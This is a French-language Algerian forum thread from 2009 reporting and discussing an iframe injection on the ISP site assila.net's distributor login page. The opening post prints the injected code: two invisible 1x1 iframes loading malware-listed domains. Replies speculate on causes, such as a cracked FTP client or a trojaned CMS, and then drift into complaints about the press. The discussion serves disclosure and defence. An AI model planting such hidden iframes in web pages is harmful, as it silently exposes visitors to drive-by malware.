IL SEMBLE QUE VOUS UTILISEZ ADBLOC POUR BLOQUER LA PUBLICITÉ, AUCUNE PUB INTRUSIVE SUR FDZ ET PAS DE POPUP
FDZ EST GRATUIT DONC MERCI DE DÉSACTIVER VOTRE ADBLOCK ET DE BIEN VOULOIR PARTICIPER ET JOUER LE JEU


PAR SUITE D'ABUS LES SERVEURS CCCAM ET ABONNEMENT NE SONT PAS TOLÉRÉS SUR LE FORUM

Page 1 sur 2 12 DernièreDernière
Affichage des résultats 1 à 10 sur 13
Share |

Discussion: Le site assila.net (EEPAD) infecté par une injection de iframe

  1. #1
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Exclamation Le site assila.net (EEPAD) infecté par une injection de iframe

    Salam,

    Suite au blackout eepadien de cette nuit, je me suis amusé a naviguer sur les sites d'eepad ...

    Surprise! Une page du site www.assila.net (http://www.asila.net/distributeur.asila.net/index.php) est infectée par deux liens vers des sites malveillants.

    La page infectée n'est ni moins ni plus que la page d'authentification des distributeurs d'eepad, ces derniers peuvent renouveler les abonnements des clients et accéder a la base de données clientèle de EEPAD, ce qui rend la faille infiniment grave!

    Voici le code qu'on peut trouver sur cette page:

    Code:
    <iframe
    src="http://thedeadpit.com/?click=1923906"width=1 height=1 style="visibility:hidden;position:absolute">
    </iframe>
    <iframe
    src="http://internetcountercheck.com/?click=2834203" width=1 height=1 style="visibility:hidden;position:absolute">
    </iframe>
    Il s'agit, d'une tentative d'injection d'un logiciel ou code malveillant, les deux iframes tentent d'infecter tous les visiteurs qui consultent la page d'authentification des distributeurs d'eepad ou de d&#233;tourner leurs requ&#234;tes d'authentification vers les sites : thedeadpit.com et internetcountercheck.com qui sont sur la blacklist de Google:

    http://safebrowsing.clients.google.c...hedeadpit.com/


    Ce site est consid&#233;r&#233; comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

    Parmi les programmes malveillants figuraient 35 trojan(s). En moyenne, l'infection a g&#233;n&#233;r&#233; 0 nouveaux processus sur l'ordinateur cible.
    This site was hosted on 257 network(s) including AS8708 (RDSNET), AS7132 (SBIS), AS30890 (EVOLVA).



    Ce site a h&#233;berg&#233; des programmes malveillants au cours des 90 derniers jours. Il a infect&#233; 57 domaine(s), dont ncclassifiedonline.net/, rehberweb.com.tr/, el7ooob.com/.
    http://safebrowsing.clients.google.c...ntercheck.com/

    Ce site est consid&#233;r&#233; comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.


    Parmi les programmes malveillants figuraient 5 trojan(s). En moyenne, l'infection a g&#233;n&#233;r&#233; 0 nouveaux processus sur l'ordinateur cible. This site was hosted on 199 network(s) including AS8708 (RDSNET), AS9143 (AtHome Benelux BV), AS30890 (EVOLVA).


    Ce site a h&#233;berg&#233; des programmes malveillants au cours des 90 derniers jours. Il a infect&#233; 10 domaine(s), dont prsena.com/, shayarinsms.com/, 140mp3.com/.
    Je ne veux pas critiquer eepad ni pol&#233;miquer (j'en ai plus qu'assez) et vous demande de ne pas le faire aussi, &#231;a ne sert a rien!

    Je pr&#233;f&#232;re que nous restions objectifs et que nous nous posions des questions sur la vuln&#233;rabilit&#233; elle m&#234;me; &#231;a nous aidera peut &#234;tre a &#233;viter ce genre d'attaque sur nos sites. Pensez vous que &#231;a soit un ver qui se propage automatiquement? mais dans ce cas pourquoi il se trouverait uniquement sur la page d'authentification des distributeurs!

    Dans le cas contraire (attaque cibl&#233;e) quelle est int&#233;r&#234;t de internetcountercheck.com et thedeadpit.com a prendre la main sur le contenu de cette page? ou s'agirait-il d'outils de piratage h&#233;berg&#233;s sur ces sites qui permettaient a de tiers personnes de s'accaparer des comptes?

    Plusieurs sites ont &#233;t&#233; d&#233;j&#224; infect&#233;s par cette m&#234;me vuln&#233;rabilit&#233; ce qui me laisse dire que c'est plut&#244;t un Ver qui se propage automatiquement, mais pourquoi il a touch&#233; uniquement cette page du site assila? le r&#233;pertoire /distributeur.asila.net/ est vuln&#233;rable?

    A vous!
    Dernière modification par assilabox ; 26/02/2009 à 12h13.

  2. #2
    Date d'inscription
    février 2008
    Localisation
    Alger
    Messages
    471
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    10

    Par défaut

    A premi&#232;re vue c'est des injections auto de sites vuln&#233;rables. Mais je ne connais pas quel service ou quel r&#244;le joue ces "distributeurs" d'Eepad.

    Si c'est cibl&#233;, c'est plu&#244;t un "offre de service" de ce site (dans l'iframe) au "attaquants" int&#233;ress&#233;s par le service d'Eepad.

  3. #3
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Par défaut Cybers partenaires

    Cliquer ici pour agrandir Envoyé par SecDz Cliquer ici pour agrandir
    A première vue c'est des injections auto de sites vulnérables. Mais je ne connais pas quel service ou quel rôle joue ces "distributeurs" d'Eepad.

    Si c'est ciblé, c'est pluôt un "offre de service" de ce site (dans l'iframe) au "attaquants" intéressés par le service d'Eepad.
    Les distributeurs d'EEPAD c'est ce que appel eepad les Cybers partenaires, en cherchant sur le site assila.net je tombe sur la liste des Cybers partenaires et je tombe encore sur une page vulnérable!

    Une autre page du même service est infectée! il s'agit de la page http://www.assila.net/cyber_partenaire.html

    Curieux! Non?

    Affaire a suivre...

  4. #4
    Date d'inscription
    janvier 2008
    Localisation
    Kabylie
    Messages
    2 191
    Remerciements
    3
    Remercié 10 fois dans 4 messages
    Pouvoir de réputation
    0

    Par défaut

    waw je click sur le lien que ta donner assila et je tombe sur sa :

    Cliquer ici pour agrandir

  5. #5
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    chez toutes les soci&#233;t&#233;s visit&#233;, et ou j'ai eu &#224; intervenir, la cause est:

    l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch.
    il ajoute automatiquement le ifram aux fichiers php envoy&#233; sur le serveur lors de l'upload.

    en ce qui concerne les soci&#233;t&#233; de presse &#233;crites arabophones, c'etait un cms vivvo , il y avait une version patch&#233; avec un trojan a l'interieur qui fait cela.

    A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des probl&#232;mes.
    c'est ce qui m'est arriv&#233;, lors de la derni&#232;re vague sur les sites de la presse &#233;crite arabophone.

    il parait que c'est moi qui fait cela , et puis je t&#233;l&#233;phone pour gagner de l'argent.
    "paroles d'un tr&#232;s haut responsable charg&#233; de la cyber criminalit&#233; en Alg&#233;rie".

    mais quand je vois le webmaster de zataz aller presque en prison pour avoir alerter une soci&#233;t&#233; je m'attend a encore plus en Alg&#233;rie.

    n'importe quoi......

  6. #6
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Par défaut

    Salam,

    Effectivement Zving, voila ce que j'ai lorsque j'utilise Google Chrome:

    Cliquer ici pour agrandir
    Images attachées Images attachées

  7. #7
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Par défaut

    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    chez toutes les soci&#233;t&#233;s visit&#233;, et ou j'ai eu &#224; intervenir, la cause est:

    l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch. il ajoute automatiquement le ifram aux fichiers php envoy&#233; sur le serveur lors de l'upload.
    Ce qui expliquerait la chose, la personne charg&#233;e de la partie "distributeurs" dans le site web utiliserait un logiciel de FTP cra-ck&#233; ... et pourtant filezilla ou autres existent!

    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    en ce qui concerne les soci&#233;t&#233; de presse &#233;crites arabophones, c'etait un cms vivvo , il y avait une version patch&#233; avec un trojan a l'interieur qui fait cela.

    A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des probl&#232;mes. C'est ce qui m'est arriv&#233;, lors de la derni&#232;re vague sur les sites de la presse &#233;crite arabophone.

    il parait que c'est moi qui fait cela , et puis je t&#233;l&#233;phone pour gagner de l'argent."paroles d'un tr&#232;s haut responsable charg&#233; de la cyber criminalit&#233; en Alg&#233;rie".
    C'est triste!

  8. #8
    Date d'inscription
    février 2008
    Localisation
    Alger
    Messages
    471
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    10

    Par défaut

    Ce qui me dérange le plus dans ces hitoires de hack, c'est le manque de réactivité.

    On peut comprendre qu'on a fait une "erreur" ce qui a comme résultat la compromission du site par exemple. Mais, ne pas détecter ça après des jours et ne pas réagir 'es vraiment grave.

    Alors Eepad (le PDG), avant de parler de cybercriminalité et donner des conseils au autres, nettoyez de grace devant votre porte !!

    Si j'étais AT ou un autre ISP, je ferais un petit article dans se sens avec mes "amis" journalistes Cliquer ici pour agrandir

  9. #9
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    bien dit pour les journalistes, même ceux qui travaillent en algérie à partir du canada."il se reconaitra".
    Dans le domaine des tic c'est un clan fermé qui se partagent les cadeaux des majors, à noter que cadeau peut être un paquet de marlboro.........".
    Il n y a rien a attendre d'eux, et je pèse mes mots, soit ils signent un papier qui leur a été envoyé tous prêt, soit ils écrivent un papier bidon, pour mettre à la fin "comme le site algérien ..qu'il faut visiter d'urgence..." et en fin, soit ils vont sur internet et jouent du controle-V puis controle-C.
    Dans la presse arabophone, les pro des tic sont quasiment inexistant, c'est généralement du copier coller.

    et pour finir, je vais vous raconter une histoire vraie:

    invité, moi et ma femme par l'ambassadeur de Pologne à une soirée qui était couverte par la presse, il y avait un buffet et ensuite des intervenants parlaient.
    on était assis et derrière moi, il y avait une jeune journaliste qui parlait au téléphone, "on entendais tout" moi et ma femme.
    "allo....allo....passez moi la rédaction.....ya djedeeeeeek....tu a raté.....youuuuuuu.......wahed el gato.......ma nahkilekch............."
    la journaliste , a passé une demi heure au mobile à énumérer les gâteaux, le poisson et le jus sans alcool, qui a été précisé maintes fois par l'ambassadeur.

    ce soir la, j'ai appris beaucoup sur la presse algérienne.
    et je connais pratiquement tous les journalistes pseudo"TIC" de tous les journaux.
    MAKANE WALOU

  10. #10
    Date d'inscription
    février 2008
    Localisation
    Alger
    Messages
    471
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    10

    Par défaut

    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    ce soir la, j'ai appris beaucoup sur la presse algérienne.
    et je connais pratiquement tous les journalistes pseudo"TIC" de tous les journaux.
    MAKANE WALOU
    Ta boite ne fera jamais la couverture d'aucun journal....t'es grillé Cliquer ici pour agrandir

Page 1 sur 2 12 DernièreDernière

Discussions similaires

  1. assila.net & eepad.dz online ? kizako?
    Par R. Lyès dans le forum EEPAD
    Réponses: 32
    Dernier message: 06/11/2009, 10h20
  2. Le site de EEPAD piraté!
    Par assilabox dans le forum Humour
    Réponses: 2
    Dernier message: 21/10/2009, 00h57
  3. Réponses: 1427
    Dernier message: 21/09/2009, 14h26
  4. Le site elkhabar.com infecté par une injection de iframe
    Par hAnI dans le forum Sécurité Informatique
    Réponses: 17
    Dernier message: 22/03/2009, 15h06
  5. [EEPAD] avoir assila box
    Par infofeet dans le forum EEPAD
    Réponses: 5
    Dernier message: 19/09/2008, 04h41

Liens sociaux

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •  
[Auto utilitaire DZ] [Webimag] [Algérie Info] [Guide Algérie] [Mosquée ALBADR MEAUX] [Photographe MARIAGE]

is PageRank Checking Icon